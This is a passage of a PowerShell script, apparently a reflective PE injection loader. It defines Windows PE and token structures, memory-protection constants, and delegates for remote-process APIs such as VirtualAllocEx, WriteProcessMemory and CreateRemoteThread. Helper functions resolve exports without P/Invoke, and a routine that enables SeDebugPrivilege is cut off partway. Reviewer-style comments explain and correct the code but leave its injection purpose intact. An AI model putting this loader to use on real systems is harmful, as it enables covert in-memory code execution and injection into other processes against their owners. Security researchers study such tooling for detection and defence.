$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
$nameField.SetCustomAttribute($AttribBuilder)
$TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
$IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER
#Struct IMAGE_BASE_RELOCATION
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
$IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION
#Struct IMAGE_IMPORT_DESCRIPTOR
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
$IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR
#Struct IMAGE_EXPORT_DIRECTORY
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
$IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY
#Struct LUID
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
$LUID = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID
#Struct LUID_AND_ATTRIBUTES
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
$TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
$TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
$LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES
#Struct TOKEN_PRIVILEGES
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
$TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
$TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES
return $Win32Types
}
Function Get-Win32Constants
{
    # Builds the bag of Win32 / PE constants the loader uses (memory allocation
    # and page-protection flags, relocation types, section and file
    # characteristics, token access/privilege flags).  Values mirror the
    # Windows SDK headers and are exposed as NoteProperties, so callers use
    # e.g. $Win32Constants.PAGE_EXECUTE_READWRITE.
    #
    # The numeric literals are kept exactly as written (including 0x80000000)
    # so the values keep the type PowerShell assigns to the literal.
    #
    # Returns: a PSObject with one NoteProperty per constant.
    $Definitions = @(
        # VirtualAlloc / VirtualFree allocation types
        @('MEM_COMMIT',                             0x00001000),
        @('MEM_RESERVE',                            0x00002000),
        # Page protection values
        @('PAGE_NOACCESS',                          0x01),
        @('PAGE_READONLY',                          0x02),
        @('PAGE_READWRITE',                         0x04),
        @('PAGE_WRITECOPY',                         0x08),
        @('PAGE_EXECUTE',                           0x10),
        @('PAGE_EXECUTE_READ',                      0x20),
        @('PAGE_EXECUTE_READWRITE',                 0x40),
        @('PAGE_EXECUTE_WRITECOPY',                 0x80),
        @('PAGE_NOCACHE',                           0x200),
        # Base relocation entry types
        @('IMAGE_REL_BASED_ABSOLUTE',               0),
        @('IMAGE_REL_BASED_HIGHLOW',                3),
        @('IMAGE_REL_BASED_DIR64',                  10),
        # Section characteristics
        @('IMAGE_SCN_MEM_DISCARDABLE',              0x02000000),
        @('IMAGE_SCN_MEM_EXECUTE',                  0x20000000),
        @('IMAGE_SCN_MEM_READ',                     0x40000000),
        @('IMAGE_SCN_MEM_WRITE',                    0x80000000),
        @('IMAGE_SCN_MEM_NOT_CACHED',               0x04000000),
        @('MEM_DECOMMIT',                           0x4000),
        # IMAGE_FILE_HEADER.Characteristics
        @('IMAGE_FILE_EXECUTABLE_IMAGE',            0x0002),
        @('IMAGE_FILE_DLL',                         0x2000),
        # IMAGE_OPTIONAL_HEADER.DllCharacteristics
        @('IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE',  0x40),
        @('IMAGE_DLLCHARACTERISTICS_NX_COMPAT',     0x100),
        @('MEM_RELEASE',                            0x8000),
        # Token access rights / privilege attributes
        @('TOKEN_QUERY',                            0x0008),
        @('TOKEN_ADJUST_PRIVILEGES',                0x0020),
        @('SE_PRIVILEGE_ENABLED',                   0x2),
        @('ERROR_NO_TOKEN',                         0x3f0)
    )

    $Win32Constants = New-Object System.Object
    foreach ($Definition in $Definitions)
    {
        $Win32Constants | Add-Member -MemberType NoteProperty -Name $Definition[0] -Value $Definition[1]
    }
    return $Win32Constants
}
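Function Get-Win32Functions
{
    # Resolves every Win32 / CRT export the loader calls and wraps each one in a
    # typed delegate (via Get-ProcAddress and Get-DelegateType, defined elsewhere
    # in this file) so it can be invoked from PowerShell without Add-Type or
    # P/Invoke declarations.  Each delegate is attached as a NoteProperty on the
    # returned object and is called as, e.g., $Win32Functions.VirtualAlloc.Invoke(...).
    #
    # Returns: a PSObject whose NoteProperties are the delegates registered below.
    # Throws : when an export cannot be resolved (see Register-Win32Function).
    #
    # NOTE(review): memcpy/memset are taken from msvcrt.dll; whether that module is
    # loaded on demand or must already be mapped in the process depends on
    # Get-ProcAddress, which is not visible here - confirm against that helper.
    $Win32Functions = New-Object System.Object

    # Resolve $ProcName in $Module, build a delegate type from $ParameterTypes
    # (plus $ReturnType when supplied) and attach the delegate as property $Name.
    Function Register-Win32Function
    {
        Param(
            [Parameter(Mandatory = $true)]
            [String]
            $Name,
            [Parameter(Mandatory = $true)]
            [String]
            $Module,
            [Parameter(Mandatory = $true)]
            [String]
            $ProcName,
            [Parameter(Mandatory = $true)]
            [AllowEmptyCollection()]
            [Type[]]
            $ParameterTypes,
            [Type]
            $ReturnType
        )
        $Address = Get-ProcAddress $Module $ProcName
        # Report the export that failed instead of the bare ArgumentNullException
        # GetDelegateForFunctionPointer raises for a null/zero pointer.
        if (($null -eq $Address) -or ($Address -eq [IntPtr]::Zero))
        {
            Throw "Get-Win32Functions: unable to resolve $Module!$ProcName"
        }
        if ($PSBoundParameters.ContainsKey('ReturnType'))
        {
            $DelegateType = Get-DelegateType $ParameterTypes $ReturnType
        }
        else
        {
            # No explicit return type: Get-DelegateType's default applies, as before.
            $DelegateType = Get-DelegateType $ParameterTypes
        }
        $Delegate = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($Address, $DelegateType)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name $Name -Value $Delegate
    }

    # --- Memory management (local and remote process) ---
    Register-Win32Function -Name 'VirtualAlloc' -Module 'kernel32.dll' -ProcName 'VirtualAlloc' -ParameterTypes @([IntPtr], [UIntPtr], [UInt32], [UInt32]) -ReturnType ([IntPtr])
    Register-Win32Function -Name 'VirtualAllocEx' -Module 'kernel32.dll' -ProcName 'VirtualAllocEx' -ParameterTypes @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) -ReturnType ([IntPtr])
    Register-Win32Function -Name 'memcpy' -Module 'msvcrt.dll' -ProcName 'memcpy' -ParameterTypes @([IntPtr], [IntPtr], [UIntPtr]) -ReturnType ([IntPtr])
    Register-Win32Function -Name 'memset' -Module 'msvcrt.dll' -ProcName 'memset' -ParameterTypes @([IntPtr], [Int32], [IntPtr]) -ReturnType ([IntPtr])

    # --- Module / export resolution (ANSI variants, matching the [String] marshalling) ---
    Register-Win32Function -Name 'LoadLibrary' -Module 'kernel32.dll' -ProcName 'LoadLibraryA' -ParameterTypes @([String]) -ReturnType ([IntPtr])
    Register-Win32Function -Name 'GetProcAddress' -Module 'kernel32.dll' -ProcName 'GetProcAddress' -ParameterTypes @([IntPtr], [String]) -ReturnType ([IntPtr])
    # Same export, second delegate: lpProcName as an IntPtr so ordinals can be passed.
    Register-Win32Function -Name 'GetProcAddressOrdinal' -Module 'kernel32.dll' -ProcName 'GetProcAddress' -ParameterTypes @([IntPtr], [IntPtr]) -ReturnType ([IntPtr])

    Register-Win32Function -Name 'VirtualFree' -Module 'kernel32.dll' -ProcName 'VirtualFree' -ParameterTypes @([IntPtr], [UIntPtr], [UInt32]) -ReturnType ([Bool])
    Register-Win32Function -Name 'VirtualFreeEx' -Module 'kernel32.dll' -ProcName 'VirtualFreeEx' -ParameterTypes @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) -ReturnType ([Bool])
    Register-Win32Function -Name 'VirtualProtect' -Module 'kernel32.dll' -ProcName 'VirtualProtect' -ParameterTypes @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) -ReturnType ([Bool])
    Register-Win32Function -Name 'GetModuleHandle' -Module 'kernel32.dll' -ProcName 'GetModuleHandleA' -ParameterTypes @([String]) -ReturnType ([IntPtr])
    Register-Win32Function -Name 'FreeLibrary' -Module 'kernel32.dll' -ProcName 'FreeLibrary' -ParameterTypes @([IntPtr]) -ReturnType ([Bool])

    # --- Process / thread handling ---
    Register-Win32Function -Name 'OpenProcess' -Module 'kernel32.dll' -ProcName 'OpenProcess' -ParameterTypes @([UInt32], [Bool], [UInt32]) -ReturnType ([IntPtr])
    Register-Win32Function -Name 'WaitForSingleObject' -Module 'kernel32.dll' -ProcName 'WaitForSingleObject' -ParameterTypes @([IntPtr], [UInt32]) -ReturnType ([UInt32])
    Register-Win32Function -Name 'WriteProcessMemory' -Module 'kernel32.dll' -ProcName 'WriteProcessMemory' -ParameterTypes @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) -ReturnType ([Bool])
    Register-Win32Function -Name 'ReadProcessMemory' -Module 'kernel32.dll' -ProcName 'ReadProcessMemory' -ParameterTypes @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) -ReturnType ([Bool])
    Register-Win32Function -Name 'CreateRemoteThread' -Module 'kernel32.dll' -ProcName 'CreateRemoteThread' -ParameterTypes @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) -ReturnType ([IntPtr])
    Register-Win32Function -Name 'GetExitCodeThread' -Module 'kernel32.dll' -ProcName 'GetExitCodeThread' -ParameterTypes @([IntPtr], [Int32].MakeByRefType()) -ReturnType ([Bool])

    # --- Token / privilege adjustment ---
    Register-Win32Function -Name 'OpenThreadToken' -Module 'Advapi32.dll' -ProcName 'OpenThreadToken' -ParameterTypes @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) -ReturnType ([Bool])
    Register-Win32Function -Name 'GetCurrentThread' -Module 'kernel32.dll' -ProcName 'GetCurrentThread' -ParameterTypes @() -ReturnType ([IntPtr])
    Register-Win32Function -Name 'AdjustTokenPrivileges' -Module 'Advapi32.dll' -ProcName 'AdjustTokenPrivileges' -ParameterTypes @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) -ReturnType ([Bool])
    Register-Win32Function -Name 'LookupPrivilegeValue' -Module 'Advapi32.dll' -ProcName 'LookupPrivilegeValueA' -ParameterTypes @([String], [String], [IntPtr]) -ReturnType ([Bool])
    Register-Win32Function -Name 'ImpersonateSelf' -Module 'Advapi32.dll' -ProcName 'ImpersonateSelf' -ParameterTypes @([Int32]) -ReturnType ([Bool])

    # NtCreateThreadEx is only bound on Vista / Windows 7 (6.0 <= version < 6.2);
    # it is not exported by ntdll.dll on Windows XP, and the property is simply
    # absent on other versions, so callers must check for it before invoking.
    # NOTE(review): [Environment]::OSVersion may report 6.2 on Windows 8.1+ when
    # the host lacks a compatibility manifest; that value still falls outside the
    # range, so the check behaves the same either way.
    if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2)))
    {
        Register-Win32Function -Name 'NtCreateThreadEx' -Module 'NtDll.dll' -ProcName 'NtCreateThreadEx' -ParameterTypes @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) -ReturnType ([UInt32])
    }

    Register-Win32Function -Name 'IsWow64Process' -Module 'Kernel32.dll' -ProcName 'IsWow64Process' -ParameterTypes @([IntPtr], [Bool].MakeByRefType()) -ReturnType ([Bool])
    Register-Win32Function -Name 'CreateThread' -Module 'Kernel32.dll' -ProcName 'CreateThread' -ParameterTypes @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) -ReturnType ([IntPtr])

    # Fixed: this delegate previously resolved kernel32!VirtualFree under the name
    # LocalFree with a single-argument signature, so LocalFree.Invoke($ptr) would
    # have called VirtualFree with unspecified dwSize/dwFreeType arguments.  It now
    # binds the real LocalFree export.  The delegate keeps its original shape (no
    # explicit return type) so existing call sites are unaffected.
    Register-Win32Function -Name 'LocalFree' -Module 'kernel32.dll' -ProcName 'LocalFree' -ParameterTypes @([IntPtr])

    return $Win32Functions
}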
#####################################
#####################################
########### HELPERS ############
#####################################
#PowerShell only does signed arithmetic, so memory-address calculations must go through the helper functions below
#They subtract, add and compare Int64 values as if they were unsigned so that addresses are calculated accurately
Function Sub-SignedIntAsUnsigned
{
    # Computes Value1 - Value2 with both Int64 inputs treated as unsigned 64-bit
    # quantities (the result wraps modulo 2^64) and returns the difference
    # reinterpreted as an Int64. PowerShell has no unsigned arithmetic, so the
    # subtraction is done byte by byte on the little-endian representation with an
    # explicit borrow.
    # Throws if the two byte representations differ in length (cannot happen for
    # two Int64 inputs, but the check is kept).
    Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Int64]
        $Value1,
        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $Value2
    )
    [Byte[]]$Minuend = [BitConverter]::GetBytes($Value1)
    [Byte[]]$Subtrahend = [BitConverter]::GetBytes($Value2)
    if ($Minuend.Count -ne $Subtrahend.Count)
    {
        Throw "Cannot subtract bytearrays of different sizes"
    }
    [Byte[]]$Result = [BitConverter]::GetBytes([UInt64]0)
    $Borrow = 0
    $Index = 0
    while ($Index -lt $Minuend.Count)
    {
        # Apply the borrow from the previous (less significant) byte first.
        $Current = $Minuend[$Index] - $Borrow
        if ($Current -lt $Subtrahend[$Index])
        {
            # Not enough in this byte: borrow from the next more significant one.
            $Current += 256
            $Borrow = 1
        }
        else
        {
            $Borrow = 0
        }
        [UInt16]$Difference = $Current - $Subtrahend[$Index]
        $Result[$Index] = $Difference -band 0x00FF
        $Index++
    }
    return [BitConverter]::ToInt64($Result, 0)
}
Function Add-SignedIntAsUnsigned
{
    # Computes Value1 + Value2 with both Int64 inputs treated as unsigned 64-bit
    # quantities (wrapping modulo 2^64) and returns the sum reinterpreted as an
    # Int64. The addition is performed on the little-endian byte representation
    # with an explicit carry, because PowerShell arithmetic is signed only.
    # Throws if the two byte representations differ in length (cannot happen for
    # two Int64 inputs, but the check is kept).
    Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Int64]
        $Value1,
        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $Value2
    )
    [Byte[]]$Left = [BitConverter]::GetBytes($Value1)
    [Byte[]]$Right = [BitConverter]::GetBytes($Value2)
    if ($Left.Count -ne $Right.Count)
    {
        Throw "Cannot add bytearrays of different sizes"
    }
    [Byte[]]$Result = [BitConverter]::GetBytes([UInt64]0)
    $Carry = 0
    foreach ($Index in 0..($Left.Count - 1))
    {
        # At most 255 + 255 + 1 = 0x1FF, so a UInt16 holds the intermediate sum.
        [UInt16]$ByteSum = $Left[$Index] + $Right[$Index] + $Carry
        $Result[$Index] = $ByteSum -band 0x00FF
        # Bit 8 set means the byte overflowed and carries into the next position.
        $Carry = if (($ByteSum -band 0xFF00) -eq 0x100) { 1 } else { 0 }
    }
    return [BitConverter]::ToInt64($Result, 0)
}
Function Compare-Val1GreaterThanVal2AsUInt
{
    # Returns $true when Value1 is strictly greater than Value2 once both Int64
    # inputs are interpreted as unsigned 64-bit values; $false otherwise
    # (including when they are equal). Negative Int64 inputs therefore compare as
    # large unsigned values.
    # Throws if the two byte representations differ in length (cannot happen for
    # two Int64 inputs, but the check is kept).
    Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Int64]
        $Value1,
        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $Value2
    )
    [Byte[]]$Left = [BitConverter]::GetBytes($Value1)
    [Byte[]]$Right = [BitConverter]::GetBytes($Value2)
    if ($Left.Count -ne $Right.Count)
    {
        Throw "Cannot compare byte arrays of different size"
    }
    # GetBytes is little-endian here, so the most significant byte is the last
    # one; walk downwards and let the first differing byte decide.
    $Index = $Left.Count - 1
    while ($Index -ge 0)
    {
        if ($Left[$Index] -ne $Right[$Index])
        {
            return ($Left[$Index] -gt $Right[$Index])
        }
        $Index--
    }
    # All bytes equal: not strictly greater.
    return $false
}
Function Convert-UIntToInt
{
    # Reinterprets the bit pattern of a UInt64 as an Int64 (no range check, so
    # values at or above 2^63 come back negative). Used to move unsigned
    # address-sized values into the Int64 parameters the other helpers take.
    Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [UInt64]
        $Value
    )
    return [BitConverter]::ToInt64([BitConverter]::GetBytes($Value), 0)
}
Function Test-MemoryRangeValid
{
    # Bounds check for a write of $Size bytes at $StartAddress against the image
    # described by $PEInfo: throws if the range begins below $PEInfo.PEHandle or
    # ends past $PEInfo.EndAddress, otherwise returns nothing. $DebugString is
    # appended to the error text so the caller's context appears in the exception.
    # Comparisons are done unsigned via the *AsUInt helpers so addresses above
    # 2^63 are handled; the end address is assumed not to wrap past 2^64.
    Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [String]
        $DebugString,
        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $PEInfo,
        [Parameter(Position = 2, Mandatory = $true)]
        [IntPtr]
        $StartAddress,
        [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
        [IntPtr]
        $Size
    )
    [IntPtr]$RangeEnd = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
    # Range starts before the mapped image?
    if (Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress))
    {
        Throw "Trying to write to memory smaller than allocated address range. $DebugString"
    }
    # Range runs past the end of the mapped image?
    if (Compare-Val1GreaterThanVal2AsUInt ($RangeEnd) ($PEInfo.EndAddress))
    {
        Throw "Trying to write to memory greater than allocated address range. $DebugString"
    }
}
Function Write-BytesToMemory
{
    # Copies $Bytes into unmanaged memory starting at $MemoryAddress, one byte at
    # a time via Marshal.WriteByte. No bounds checking is done here; the caller is
    # responsible for making sure the destination is at least $Bytes.Length long.
    Param(
        [Parameter(Position=0, Mandatory = $true)]
        [Byte[]]
        $Bytes,
        [Parameter(Position=1, Mandatory = $true)]
        [IntPtr]
        $MemoryAddress
    )
    $Position = 0
    while ($Position -lt $Bytes.Length)
    {
        # WriteByte takes a base pointer plus a byte offset.
        [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Position, $Bytes[$Position])
        $Position++
    }
}
#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/
Function Get-DelegateType
{
    # Emits, at run time, a delegate type with the requested parameter types and
    # return type so that an unmanaged function pointer can later be wrapped with
    # Marshal.GetDelegateForFunctionPointer. The type lives in an in-memory
    # dynamic assembly; its constructor and Invoke are marked runtime-implemented,
    # as the CLR requires for delegate types.
    # $Parameters defaults to no parameters, $ReturnType to void.
    # Output: the created System.Type.
    Param
    (
        [OutputType([Type])]
        [Parameter( Position = 0)]
        [Type[]]
        $Parameters = (New-Object Type[](0)),
        [Parameter( Position = 1 )]
        [Type]
        $ReturnType = [Void]
    )
    $AssemblyName = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
    $Access = [System.Reflection.Emit.AssemblyBuilderAccess]::Run
    $AsmBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($AssemblyName, $Access)
    $ModBuilder = $AsmBuilder.DefineDynamicModule('InMemoryModule', $false)
    # Delegates must derive from MulticastDelegate and be sealed.
    $DelegateBuilder = $ModBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $Ctor = $DelegateBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
    $Ctor.SetImplementationFlags('Runtime, Managed')
    $Invoke = $DelegateBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
    $Invoke.SetImplementationFlags('Runtime, Managed')
    $DelegateBuilder.CreateType()
}
#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/
Function Get-ProcAddress
{
# Resolves the address of an export ($Procedure) in a module ($Module) that is
# already loaded in the current process, without declaring any P/Invoke of its
# own: it borrows the GetModuleHandle/GetProcAddress declarations that System.dll
# carries on its internal Microsoft.Win32.UnsafeNativeMethods class.
# Output: an IntPtr. Presumably IntPtr.Zero (the Win32 failure value) when the
# module is not loaded or the export is missing - nothing here checks for that,
# and callers wrap the result directly, so a failed lookup surfaces later.
# NOTE(review): relies on a private .NET Framework type; will not resolve on
# other runtimes - confirm before reuse.
Param
(
[OutputType([IntPtr])]
[Parameter( Position = 0, Mandatory = $True )]
[String]
$Module,
[Parameter( Position = 1, Mandatory = $True )]
[String]
$Procedure
)
# Get a reference to System.dll in the GAC
# ('\\' in a single-quoted string is two backslash characters; Split() takes the
# string as a char[] of separators, so [-1] is the file name of the location.)
$SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
# this fixes VirtualAlloc issues on Windows 10 Build 1903
# (GetProcAddress has several overloads on that build; the explicit parameter
# type list picks the (HandleRef, string) one so GetMethod is unambiguous.)
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
# Wrap the raw handle in a HandleRef, which is the parameter type the selected
# GetProcAddress overload expects.
$tmpPtr = New-Object IntPtr
$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
# Return the address of the function
Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
}
Function Enable-SeDebugPrivilege
{
# Enables SeDebugPrivilege on the current thread's token via the delegates in
# $Win32Functions (GetCurrentThread, OpenThreadToken, ImpersonateSelf,
# LookupPrivilegeValue, AdjustTokenPrivileges), with structure layouts from
# $Win32Types (LUID, TOKEN_PRIVILEGES) and flag values from $Win32Constants.
# Returns nothing. Throws when the thread handle or token cannot be obtained or
# the privilege LUID cannot be looked up. Note that the final
# AdjustTokenPrivileges failure is deliberately not raised (see the todo below),
# so a caller cannot tell from this function whether the privilege is actually
# held - only that the attempt did not error out earlier.
# Parameter positions start at 1 rather than 0; positional binding still follows
# the relative order.
Param(
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Types,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Constants
)
[IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()
if ($ThreadHandle -eq [IntPtr]::Zero)
{
Throw "Unable to get the handle to the current thread"
}
# Open the thread token for query + privilege adjustment. A thread has no token
# of its own until it impersonates, which is the ERROR_NO_TOKEN case below.
[IntPtr]$ThreadToken = [IntPtr]::Zero
[Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
if ($Result -eq $false)
{
# NOTE(review): these delegates are emitted by Get-DelegateType without a
# SetLastError marshalling attribute, so GetLastWin32Error may return a stale
# value rather than this call's error - confirm before relying on the code.
$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)
{
# Give the thread its own token by impersonating the process identity, then
# retry. The literal 3 is the impersonation level argument; it presumably maps
# to SecurityDelegation in SECURITY_IMPERSONATION_LEVEL - confirm.
$Result = $Win32Functions.ImpersonateSelf.Invoke(3)
if ($Result -eq $false)
{
Throw "Unable to impersonate self"
}
$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
if ($Result -eq $false)
{
Throw "Unable to OpenThreadToken."
}
}
else
{
Throw "Unable to OpenThreadToken. Error code: $ErrorCode"
}
}
# Look up the LUID for SeDebugPrivilege into unmanaged memory.
# NOTE(review): $PLuid is never released with FreeHGlobal (only
# $TokenPrivilegesMem is, below), and $ThreadToken is never closed - both leak.
[IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
$Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid)
if ($Result -eq $false)
{
Throw "Unable to call LookupPrivilegeValue"
}
# Build a TOKEN_PRIVILEGES with a single entry (the LUID just looked up, marked
# enabled) and marshal it back into the unmanaged buffer for the API call.
[UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
[IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)
$TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)
$TokenPrivileges.PrivilegeCount = 1
